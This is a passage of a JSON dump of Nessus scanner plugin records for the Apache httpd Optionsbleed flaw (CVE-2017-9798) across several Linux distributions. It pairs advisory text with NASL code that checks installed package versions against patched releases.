(\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"httpd-2.4.27-8.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:30", "description": "Security Fix(es) :\n\n - A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)", "cvss3": {}, "published": "2017-10-12T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : httpd on SL7.x x86_64 (20171011) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:httpd", "p-cpe:/a:fermilab:scientific_linux:httpd-debuginfo", "p-cpe:/a:fermilab:scientific_linux:httpd-devel", "p-cpe:/a:fermilab:scientific_linux:httpd-manual", "p-cpe:/a:fermilab:scientific_linux:httpd-tools", "p-cpe:/a:fermilab:scientific_linux:mod_ldap", "p-cpe:/a:fermilab:scientific_linux:mod_proxy_html", "p-cpe:/a:fermilab:scientific_linux:mod_session", "p-cpe:/a:fermilab:scientific_linux:mod_ssl", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20171011_HTTPD_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/103806", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103806);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-9798\");\n\n script_name(english:\"Scientific Linux Security Update : httpd on SL7.x x86_64 (20171011) (Optionsbleed)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - A use-after-free flaw was found in the way httpd handled\n invalid and previously unregistered HTTP methods\n specified in the Limit directive used in an .htaccess\n file. A remote attacker could possibly use this flaw to\n disclose portions of the server memory, or cause httpd\n child process to crash. (CVE-2017-9798)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1710&L=scientific-linux-errata&F=&S=&P=9988\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e195877f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/12\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"httpd-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"httpd-debuginfo-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"httpd-devel-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"httpd-manual-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"httpd-tools-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"mod_ldap-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"mod_proxy_html-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"mod_session-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"mod_ssl-2.4.6-67.el7_4.5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:09", "description": "From Red Hat Security Advisory 2017:2882 :\n\nAn update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nRed Hat would like to thank Hanno Bock for reporting this issue.", "cvss3": {}, "published": "2017-10-12T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : httpd (ELSA-2017-2882) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:httpd", "p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd-manual", "p-cpe:/a:oracle:linux:httpd-tools", "p-cpe:/a:oracle:linux:mod_ldap", "p-cpe:/a:oracle:linux:mod_proxy_html", "p-cpe:/a:oracle:linux:mod_session", "p-cpe:/a:oracle:linux:mod_ssl", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2017-2882.NASL", "href": "https://www.tenable.com/plugins/nessus/103803", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:2882 and \n# Oracle Linux Security Advisory ELSA-2017-2882 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103803);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_xref(name:\"RHSA\", value:\"2017:2882\");\n\n script_name(english:\"Oracle Linux 7 : httpd (ELSA-2017-2882) (Optionsbleed)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:2882 :\n\nAn update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* A use-after-free flaw was found in the way httpd handled invalid and\npreviously unregistered HTTP methods specified in the Limit directive\nused in an .htaccess file. A remote attacker could possibly use this\nflaw to disclose portions of the server memory, or cause httpd child\nprocess to crash. (CVE-2017-9798)\n\nRed Hat would like to thank Hanno Bock for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-October/007263.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/12\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"httpd-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"httpd-devel-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"httpd-manual-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"httpd-tools-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"mod_ldap-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"mod_proxy_html-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"mod_session-2.4.6-67.0.1.el7_4.5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"mod_ssl-2.4.6-67.0.1.el7_4.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-tools / mod_ldap / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:53", "description": "An update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nRed Hat would like to thank Hanno Bock for reporting this issue.", "cvss3": {}, "published": "2017-10-12T00:00:00", "type": "nessus", "title": "CentOS 7 : httpd (CESA-2017:2882) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:httpd", "p-cpe:/a:centos:centos:httpd-devel", "p-cpe:/a:centos:centos:httpd-manual", "p-cpe:/a:centos:centos:httpd-tools", "p-cpe:/a:centos:centos:mod_ldap", "p-cpe:/a:centos:centos:mod_proxy_html", "p-cpe:/a:centos:centos:mod_session", "p-cpe:/a:centos:centos:mod_ssl", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2017-2882.NASL", "href": "https://www.tenable.com/plugins/nessus/103790", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:2882 and \n# CentOS Errata and Security Advisory 2017:2882 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103790);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_xref(name:\"RHSA\", value:\"2017:2882\");\n\n script_name(english:\"CentOS 7 : httpd (CESA-2017:2882) (Optionsbleed)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* A use-after-free flaw was found in the way httpd handled invalid and\npreviously unregistered HTTP methods specified in the Limit directive\nused in an .htaccess file. A remote attacker could possibly use this\nflaw to disclose portions of the server memory, or cause httpd child\nprocess to crash. (CVE-2017-9798)\n\nRed Hat would like to thank Hanno Bock for reporting this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2017-October/022565.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?68e97394\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-9798\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/12\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"httpd-2.4.6-67.el7.centos.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"httpd-devel-2.4.6-67.el7.centos.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"httpd-manual-2.4.6-67.el7.centos.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"httpd-tools-2.4.6-67.el7.centos.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"mod_ldap-2.4.6-67.el7.centos.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"mod_proxy_html-2.4.6-67.el7.centos.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"mod_session-2.4.6-67.el7.centos.5\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"mod_ssl-2.4.6-67.el7.centos.5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-tools / mod_ldap / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:02", "description": "According to the version of the httpd packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-11-01T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP1 : httpd (EulerOS-SA-2017-1252)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:httpd", "p-cpe:/a:huawei:euleros:httpd-devel", "p-cpe:/a:huawei:euleros:httpd-manual", "p-cpe:/a:huawei:euleros:httpd-tools", "p-cpe:/a:huawei:euleros:mod_ssl", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1252.NASL", "href": "https://www.tenable.com/plugins/nessus/104277", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104277);\n script_version(\"3.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-9798\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : httpd (EulerOS-SA-2017-1252)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the httpd packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - A use-after-free flaw was found in the way httpd\n handled invalid and previously unregistered HTTP\n methods specified in the Limit directive used in an\n .htaccess file. A remote attacker could possibly use\n this flaw to disclose portions of the server memory, or\n cause httpd child process to crash. (CVE-2017-9798)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1252\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d09c3870\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = 